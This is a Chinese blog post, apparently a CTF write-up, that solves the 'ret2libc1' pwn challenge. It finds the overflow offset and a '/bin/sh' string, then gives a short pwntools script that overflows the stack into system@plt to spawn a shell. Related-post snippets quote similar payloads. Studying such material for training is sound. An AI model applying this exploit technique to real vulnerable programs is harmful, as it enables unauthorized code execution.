PWN —— ret2libc1

最新推荐文章于 2024-06-02 21:03:32 发布
最新推荐文章于 2024-06-02 21:03:32 发布
阅读量421 收藏
点赞数 1
分类专栏: PWN CTF训练 文章标签: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125589315
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

拿到题目,先checksec一下:
在这里插入图片描述
发现打开了NX,栈不可执行,则不能将自己写好的shellcode放到栈中执行,用file命令,发现是动态编译的,则不能用ROPgadget,于是看下程序中是否存在后门函数,
放入ida,发现没有后门函数,只有
在这里插入图片描述
这里调用了system函数,则想法是通过栈溢出调用system函数,并且将system函数参数换成"/bin/sh"
这里便存在三个问题:1.”/bin/sh"是否存在 2.栈构造 3. system()函数调用地址
先解决第一个问题,用strings ret2libc1 | grep /bin/sh 发现存在/bin/sh
在这里插入图片描述
第二个问题栈构造,经过动态调试,栈构造如下:
在这里插入图片描述
第三个问题,system()的地址,我们没办法知道system的地址,但我们可以使用ELF知道system@plt的地址

攻击脚本:

from pwn import *
io = process("./ret2libc1")
elf = ELF("./ret2libc1")
system_plt = elf.plt["system"]
bin_sh = next(elf.search(b'/bin/sh'))
payload = 112 * b'A' + p32(system_plt) + b'AAAA' + p32(bin_sh)
io.sendline(payload)
io.interactive()

Sucessful!!!!

Mokapeng
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc1
m0_49959202的博客
08-06 272
文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。当程序调用某个函数时,程序会去plt表内查找,plt表再去got内查找,如果got内存在那么直接返回;如果不存在那么就调用查找函数搜寻需要用到的函数,然后存入got表内。 当前的ret2libc1:有sy
从零开始学逆向:理解ret2libc-1
weixin_44626085的博客
02-19 1475
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。
ret2libc1pwn 入门题
02-11
pwn 入门题
pwn学习-ret2libc1
最新发布
Sa1nZen的博客
06-02 144
pwn学习-ret2libc1
PWN · ret2libcret2libc1
Mr_Fmnwon的博客
05-08 1031
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2237
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
ret2libc2pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libcret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
PWN · ret2libcret2libc2
Mr_Fmnwon的博客
05-08 543
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
好好说话之ret2libc1
hollk’s blog
06-22 1440
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc1 一、原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址 看C代码...
pwnret2libc1
m0_75234353的博客
04-09 99
提示:payload中的BBBB,本来是exit函数,但是系统的崩溃不妨碍我们拿到flag。所以简化版就是直接填入BBBB垃圾字节。用python3计算偏移量,可得108,再加上4字节达到返回地址。看到system函数,我们可以构建ROP链来替换参数。4.利用pwntools来构造payload。发现gets函数,为栈溢出点。栈溢出保护关,栈执行关闭。3.计算所需填充的垃圾数据。
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8096
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
跟着CTF-wiki学pwn——ret2libc1
qq_42882717的博客
07-05 394
CTF-wiki的注解:简单的ret2libc
ret2libc1做题历程分享(ctfwiki)
Rt1Text的博客
02-09 263
pwnret2libc1 system与bin/sh都给出
CTFWiki-pwn
qq_55233040的博客
05-03 1330
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值